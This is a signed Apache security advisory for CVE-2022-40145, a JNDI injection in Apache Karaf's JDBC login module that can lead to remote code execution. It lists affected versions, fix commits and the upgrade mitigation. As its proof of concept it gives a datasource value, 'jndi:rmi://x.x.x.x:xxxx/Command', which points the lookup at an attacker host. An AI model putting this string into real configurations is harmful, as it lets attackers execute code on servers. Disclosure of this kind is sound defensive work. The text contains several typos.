-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Hash: SHA512

CVE-2022-40145: LDMP injection vulnerability in JDBC Login Module with JDK 8

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected: all versions of Apache Karaf prior to 4.3.8 or 4.4.2

Description:

This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.

The method jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasourceuse uses InitialContext.lookup(jndiName) without filtering.
An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.
This is vulnerable to a remote code execution (RCE) attack when aconfiguration uses a JNDI LDAP data source URI when an attacker hascontrol of the target LDAP server.

This has been fixed in revision:

https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341
https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1

Mitigation: Apache Karaf users should upgrade to 4.3.8 or 4.4.2
or later as soon as possible, or use correct path.

JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7568

Credit: This issue was discovered and reported by Xun Bai <bbbbear68@gmail.com>
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEGqjPktQJpzOT0Lc2v/LuQsgoLnYFAmOW/5wACgkQv/LuQsgo
LnaRtBAApAsUA7+zVl03d0pKa7Dd41uec9/voRZ9DSf0byRNdP/NQslAe6ZHEbqz
/2pC3OuYj0yfBOWZ6O0uFb/iDt4+GqAz3mnZqRyDq+hcrdBY5VVxkOU+6uRtQ+Sm
GfkDmMpJDLOURgG/xQa/G8QhOLiBtBErwB5pffMBoxC12HjBPfichM6KJuT55MGR
yvR6CXsPnAlRkyhYPSkI9ehng2BbgnqCHtFQEZwXTViXoyz44/0NZc6URlytsO11
a3/qbkP1p8nvwC5U5D4P/RKRLvN23HZFbFRRms/gNN+L9BKmv8krA3ESnNgi7Kcj
7j+8gRYRzw/g41GuZARC435zCy8PH9ydoHZQnicSmQUpDzBwfCBpRFgiXpq3ztHt
7sLa3rSOVWiJmQiAjQXM1Rr958TrBYRjV2UcTbb0AYEEiZQrAeYHq1M5Y+3pcV9h
NsqEeVkDZji0nu1EoTbxcjIJjMo1G8u3k8VvKMAfrQ37gnCfOnKYYak47cwvZzmu
suatXXUQffi/YR3wercn/1AyCqYmWPbrcvI2b41eDR5JtDX6OMtRdsshCVwjEh9v
k2FSoPCM21+lpbXful4LwIMUppNfwrvn4VXsAsWG4I/g8kxbrFbI0Y/cJHPuCbU2
ABpIBEZGXh8h8TMIimM7EGkKIiF2rlohKsavtgYoi91qrpmca70=
=ozdD
-----END PGP SIGNATURE-----